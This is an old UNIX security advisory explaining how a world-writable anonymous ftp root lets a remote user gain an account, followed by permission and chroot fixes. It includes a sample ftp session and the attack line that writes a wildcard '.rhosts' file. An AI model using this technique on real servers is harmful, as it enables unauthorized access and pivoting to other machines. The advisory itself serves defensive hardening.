COMMAND ftp SYSTEM AFFECTED Any UNIX machine with an improperly configured ftp site (permissions). PROBLEM A remote user can create a login account on your machine if the root directory on your ftp site is world writable, or writable by ftp. Someone can just login as follows: evil/~> ftp target.victim.com Connected to 666.666.666.666. 220 target FTP server (Version wu-1.2(1) Mon Feb 30 18:04:42 EST 1995) ready. Name (666.666.666.666:hakd00d): ftp (or anonymous) 331 Guest login ok, send your complete e-mail address as password. Password: 230- 230-Welcome to Victim Internet Services, Inc. 230- 230- 230 Guest login ok, access restrictions apply. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls -la 200 PORT command successful. 150 Opening ASCII mode data connection for /bin/ls. total 7704 drwxrwxrwx 40 ftp other 8192 Jun 10 19:11 . drwxr-xr-x 40 root other 8192 Jun 10 19:11 .. lrwxrwxrwx 1 ftp other 8 May 24 12:19 1869 -> pub/1869 drwxrwxrwx 4 root root 4096 May 23 02:05 pix.tar.gz lrwxrwxrwx 1 ftp other 8 May 24 12:19 idiot -> pub/idiot We see that the current directory (.) is world writable AND owned by ftp. I could now just do something like: echo "+ +" > .rhosts This gives an intruder an account on your machine, and allows him to try to gain root locally, or use your machine as a jumping point to other machines. SOLUTION Directories in the ftp site should NOT be owned by ftp. ALL directories except "incoming" should be chmoded 755 (chmod 755 *). The "incoming" directory should be chmoded 733 (chmod 733 incoming). (files, btw should probably be 744) chroot the ftp directory before allowing access so if they do get an account, it will be difficult for them to access anything further back in the tree (towards root).